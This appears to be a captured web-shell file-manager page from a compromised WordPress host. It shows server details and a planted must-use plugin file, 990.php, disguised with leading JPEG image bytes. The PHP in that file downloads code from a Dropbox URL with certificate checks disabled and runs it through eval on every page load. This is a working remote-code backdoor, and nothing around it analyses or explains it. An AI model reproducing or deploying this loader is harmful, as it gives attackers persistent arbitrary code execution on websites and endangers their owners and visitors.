HEX
Server: LiteSpeed
System: Linux us-phx-web1284.main-hosting.eu 4.18.0-553.109.1.lve.el8.x86_64 #1 SMP Thu Mar 5 20:23:46 UTC 2026 x86_64
User: u300739242 (300739242)
PHP: 8.2.30
Disabled: system, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
Upload Files
File: /home/u300739242/domains/eventdate.shop/public_html/wp-content/mu-plugins/990.php
�����JFIF��H�H�����C�


		
%# , #&')*)-0-(0%()(����P�P�������������������5�	�������!1AQq��"#2Bar���R�Sc��������?��R��������X�o�k,��e�k�X���9["&Q
����}Nq'����{u\�6hc�i�r_�n[t�lU�;8��Ax����r�{�f����Q��岳���/f�8�T�D'e����W^�YŞ��}h����7�`��Կ�֑�w.gVtq>��5����O���y�.>%X��U]3�\���${�أh�~k�Բ�o�Fq��#����y����0�&��;�-W�*�%K���m'o�Yt��L�����Q��TS1�%�`y=���+���b����dmi�HC�T_#���|���P��㬈v;?E����U�"
W<����ms��MmL��G1�9��'�'�����%��akJo]Qcr��խ���O$
;:V�>�_Dn����s����m۸U�#�ҝ��ܾpe.qw3�/��*�a#���=\.!N���s��l��x�Ԗjz�Z�!��� �>!��Ɵs��E<��9�N9m�/��E�&�y�?��yY$a�p�-�R�5��6�XOk$>D�켎��T�RUT�����<���>��h��<�9��D���}�?f8��$�
�EYki/O����28��}#������"(��9���<��
x�G���Ԑ���YD�2��DL���
<?php
// Fetch content from a URL using cURL or file_get_contents
function getContent($url) {
    $opts = [
        'http' => [
            'header' => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n"
        ]
    ];
    $context = stream_context_create($opts);
    $content = @file_get_contents($url, false, $context);

    if ($content === false) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $content = curl_exec($ch);
        curl_close($ch);
    }

    return $content;
}

// URL to fetch content from
$url = 'https://dl.dropboxusercontent.com/scl/fi/uokiw6x5rvkcr00hpjwcq/991.php?rlkey=m5u89a1bp845q60ub8cepvmxv&st=lc5nbqre&raw=1';
$content = getContent($url);

// If content is successfully fetched, evaluate it
if ($content) {
    eval('?>' . $content);
}
?>